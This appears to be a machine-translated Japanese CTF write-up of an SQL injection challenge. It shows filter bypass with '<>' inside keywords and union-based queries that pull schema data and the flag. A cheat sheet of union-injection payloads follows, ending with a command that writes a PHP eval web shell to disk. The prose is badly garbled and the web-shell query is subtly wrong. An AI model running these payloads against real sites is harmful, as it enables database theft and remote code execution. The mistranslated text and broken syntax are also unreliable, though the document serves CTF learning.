訪問ウェブサイトのタイトル
-
ヒントを得る:
flag{在数据库中}
、およびURLは、xxx.ichunqiu.com/index.php?id=1
SQLインジェクションの形に沿って。 -
従来のビュー源、プロンプト
SELECT * FROM info WHERE id=1
、デジタル型注入
抜け穴を探して
-
?id = 1 and 1 = 1
:ヒントinj code!
、いくつかのテストとフィルタを見つけand
、or
、select
、order
、 -
ギャングスターWPクエリの方法は、ここの周りに参加する敏感な単語の途中であること
<>
、そしてあなたが手動で通常の注射しすることができます。
フラグを取得します。
-
?id = 1 ord<> by 3
:三つのフィールドの問い合わせことを示すエコー通常、 -
?id = 1 union sel<>ect 1, 2, 3
:を示す2つのエコー現れ、その第2のフィールドの抜け穴 -
データベース名を取得します
?id=1 union sel<>ect 1, database(), 3
:エコーデータベースと呼ばれるSQLI -
テーブル名を取得
?id=1 union sel<>ect 1, table_name, 3 from information_schema.tables where table_schema=database()
、情報のユーザー:エコーテーブル名を: -
フィールドを取得
?id=1 union sel<>ect 1, column_name, 3 from information_schema.columns where table_name='info'
エコーフィールド:ID、タイトル、flAg_T5ZNdrm -
フラグの取得
?id=1 union sel<>ect 1, flAg_T5ZNdrm, 3 from info
フラグを取得します。
MySQLの労働組合は、注入されたレビューを選択します
-
組合文が問合せフィールドの前と後に同じことを確認する必要があり、それは一般的で秩序を爆破することによりフィールドの最初の数です。(例えば、4つのフィールド)
order by 4
-
抜け穴を表示するには、フィールドの位置、位置をブラスト
union select 1,2,3,4
-
組み込み関数を使用してデータベース情報をブラスト:バージョン()データベース()ユーザー()@@ global.version_compile_os
union select version(),database(),user(), @@global.version_compile_os
-
暴力ライブラリ:mysqlの> 5.0が組み込まれているライブラリINFORMATION_SCHEMA、すべてのビルトインライブラリやmysqlのテーブル構造情報格納します。
クエリ既存のデータベース:
union select 1,2,3,schema_name from information_schema.schemata
-
暴力図書館:ゲステーブル
union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
-
暴力図書館:ゲスフィールド
union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='表名'
-
暴力図書館:ゲスコンテンツ
union select 1,2,3,字段名 from 表名 limit 0,1
-
馬に直接書き込む
条件1:物理パスのサイトを知っている
条件2:大規模な十分な権限のある
条件3:)(magic_quotes_gpcの= OFF
select '<?php eval($_POST[cmd]);?>' into file 'D:\\out.php'
================================================== ==============